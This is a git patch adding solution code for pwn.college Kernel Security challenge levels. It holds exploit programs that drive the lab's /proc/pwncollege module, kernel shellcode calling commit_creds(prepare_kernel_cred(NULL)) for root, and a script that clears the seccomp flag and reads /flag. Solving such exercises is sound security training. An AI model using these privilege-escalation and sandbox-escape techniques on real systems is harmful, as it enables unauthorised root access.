From d61516563988cb6dce687c9607a558efc821a536 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Fri, 27 Sep 2024 16:13:01 +0800 Subject: [PATCH] Added Level 3.0 ~ 8.1 of KernelSecurity in PwnCollege --- PwnCollege/KernelSecurity/Level3.0/exploit.c | 8 +++++ PwnCollege/KernelSecurity/Level3.1/exploit.c | 8 +++++ PwnCollege/KernelSecurity/Level4.0/exploit.c | 10 ++++++ PwnCollege/KernelSecurity/Level4.1/exploit.c | 10 ++++++ PwnCollege/KernelSecurity/Level5.0/exploit.c | 10 ++++++ PwnCollege/KernelSecurity/Level5.1/exploit.c | 10 ++++++ PwnCollege/KernelSecurity/Level6.0/exploit.c | 24 +++++++++++++ PwnCollege/KernelSecurity/Level7.0/exploit.c | 34 ++++++++++++++++++ .../KernelSecurity/Level8.0/shellcode.py | 36 +++++++++++++++++++ .../KernelSecurity/Level8.0/test_seccomp.c | 8 +++++ PwnCollege/KernelSecurity/common.py | 30 ++++++++++++++++ 11 files changed, 188 insertions(+) create mode 100644 PwnCollege/KernelSecurity/Level3.0/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level3.1/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level4.0/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level4.1/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level5.0/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level5.1/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level6.0/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level7.0/exploit.c create mode 100644 PwnCollege/KernelSecurity/Level8.0/shellcode.py create mode 100644 PwnCollege/KernelSecurity/Level8.0/test_seccomp.c create mode 100644 PwnCollege/KernelSecurity/common.py diff --git a/PwnCollege/KernelSecurity/Level3.0/exploit.c b/PwnCollege/KernelSecurity/Level3.0/exploit.c new file mode 100644 index 0000000..4f6cb6c --- /dev/null +++ b/PwnCollege/KernelSecurity/Level3.0/exploit.c @@ -0,0 +1,8 @@ +#include +#include +#include +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + write(fd, "oiwqgsfsdekebbgi", 0x10); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level3.1/exploit.c b/PwnCollege/KernelSecurity/Level3.1/exploit.c new file mode 100644 index 0000000..3216136 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level3.1/exploit.c @@ -0,0 +1,8 @@ +#include +#include +#include +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + write(fd, "ysrxhmxtsfctmnuv", 0x10); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level4.0/exploit.c b/PwnCollege/KernelSecurity/Level4.0/exploit.c new file mode 100644 index 0000000..cea8e50 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level4.0/exploit.c @@ -0,0 +1,10 @@ +#include +#include +#include +#include + +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + ioctl(fd, 1337, "owibidryoofhkxuo"); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level4.1/exploit.c b/PwnCollege/KernelSecurity/Level4.1/exploit.c new file mode 100644 index 0000000..aa46ec1 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level4.1/exploit.c @@ -0,0 +1,10 @@ +#include +#include +#include +#include + +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + ioctl(fd, 1337, "amykdifilzqobpdg"); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level5.0/exploit.c b/PwnCollege/KernelSecurity/Level5.0/exploit.c new file mode 100644 index 0000000..a1fd2ad --- /dev/null +++ b/PwnCollege/KernelSecurity/Level5.0/exploit.c @@ -0,0 +1,10 @@ +#include +#include +#include +#include + +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + ioctl(fd, 1337, 0xffffffffc0000000ull + 0x8edull); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level5.1/exploit.c b/PwnCollege/KernelSecurity/Level5.1/exploit.c new file mode 100644 index 0000000..c142b65 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level5.1/exploit.c @@ -0,0 +1,10 @@ +#include +#include +#include +#include + +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + ioctl(fd, 1337, 0xffffffffc0000000ull + 0xc2ull); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level6.0/exploit.c b/PwnCollege/KernelSecurity/Level6.0/exploit.c new file mode 100644 index 0000000..ea147f3 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level6.0/exploit.c @@ -0,0 +1,24 @@ +#include +#include +#include +#include +#include + +__attribute__((naked)) +void shellcode() { + asm volatile( + "xor %rdi, %rdi\n" + "movabs $0xffffffff81089660, %rsi\n" + "callq *%rsi\n" // prepare_kernel_cred + "movq %rax, %rdi\n" + "movabs $0xffffffff81089310, %rsi\n" + "callq *%rsi\n" // commit_creds + "retq\n" + ); +} + +int main() { + int fd = open("/proc/pwncollege", O_WRONLY); + write(fd, (void *)shellcode, 0x1F); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level7.0/exploit.c b/PwnCollege/KernelSecurity/Level7.0/exploit.c new file mode 100644 index 0000000..a391224 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level7.0/exploit.c @@ -0,0 +1,34 @@ +#include +#include +#include +#include +#include +#include + +struct ioctl_args { + uint64_t length; + uint8_t shellcode[0x1000]; + uint64_t codeptr; +}args; + +__attribute__((naked)) +void shellcode() { + asm volatile( + "xor %rdi, %rdi\n" + "movabs $0xffffffff81089660, %rsi\n" + "callq *%rsi\n" // prepare_kernel_cred + "movq %rax, %rdi\n" + "movabs $0xffffffff81089310, %rsi\n" + "callq *%rsi\n" // commit_creds + "retq\n" + ); +} + +int main() { + args.length = 0x1f; + memcpy(args.shellcode, shellcode, args.length); + args.codeptr = 0xffffc90000085000ull; + int fd = open("/proc/pwncollege", O_WRONLY); + ioctl(fd, 1337, &args); + execve("/bin/bash", NULL, NULL); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level8.0/shellcode.py b/PwnCollege/KernelSecurity/Level8.0/shellcode.py new file mode 100644 index 0000000..78ad84e --- /dev/null +++ b/PwnCollege/KernelSecurity/Level8.0/shellcode.py @@ -0,0 +1,36 @@ +import sys +sys.path.append("..") + +from pwn import context, shellcraft +from common import * +context(arch = 'amd64', os = 'linux') + +kernel_assembly = f""" +/* current->thread_info.flags &= ~(1 << TIF_SECCOMP); */ +mov rdx, gs:0x15d00 /* runtime-relocated offsets */ +mov rax, [rdx] +and ah, 0xfe +mov [rdx], rax +/* commit_creds(prepare_kernel_cred(NULL)); */ +xor rdi, rdi +movabs rsi, 0xffffffff81089660 +call rsi /* prepare_kernel_cred */ +mov rdi, rax +movabs rsi, 0xffffffff81089310 +call rsi /* commit_creds */ +ret +""".strip() + +kernel_machine_code = dump_machine_code(kernel_assembly) + +user_assembly = f""" +{shellcraft.amd64.pushstr(kernel_machine_code, append_null=False)} +{shellcraft.amd64.linux.syscall("SYS_write", 3, "rsp", len(kernel_machine_code))} +{shellcraft.amd64.linux.cat("/flag")} +""".strip() + +user_machine_code = dump_machine_code(user_assembly) + +with open('shellcode.bin', 'wb') as f: + f.write(user_machine_code) + f.write(b'\xcc' * (0x1000 - len(user_machine_code))) \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c b/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c new file mode 100644 index 0000000..85a95a4 --- /dev/null +++ b/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c @@ -0,0 +1,8 @@ +#include +#include +#include +MODULE_LICENSE("GPT"); + +void* test_unset_seccomp_flag_in_thread_info_flags(void) { + return current->thread_info.flags &= ~(1 << TIF_SECCOMP); +} \ No newline at end of file diff --git a/PwnCollege/KernelSecurity/common.py b/PwnCollege/KernelSecurity/common.py new file mode 100644 index 0000000..f0ace93 --- /dev/null +++ b/PwnCollege/KernelSecurity/common.py @@ -0,0 +1,30 @@ +from pwn import asm, disasm, util +import struct + +def i2f(x): + return struct.unpack('!d', struct.pack('!Q', x))[0] + +def f2i(x): + return struct.unpack('!Q', struct.pack('!d', x))[0] + +def dump_machine_code(assembly: str): + machine_code = asm(assembly) + print("Assembly:") + print(assembly) + print("Byte Array:", list(machine_code)) + padding = b"\xcc" * ((4 - len(machine_code)) % 4) + unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=True) + unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=False) + print("Signed DWord Array:", unpacked_signed_array) + print("Unsigned DWord Array:", unpacked_unsigned_array) + print("Hex DWord Array:", list(map(hex, unpacked_unsigned_array))) + padding = b"\xcc" * ((8 - len(machine_code)) % 8) + unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=True) + unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=False) + print("Signed QWord Array:", unpacked_signed_array) + print("Unsigned QWord Array:", unpacked_unsigned_array) + print("Hex QWord Array:", list(map(hex, unpacked_unsigned_array))) + print("Double Array:", list(map(i2f, unpacked_unsigned_array))) + print("Disassembled-assembly:") + print(disasm(machine_code)) + return machine_code \ No newline at end of file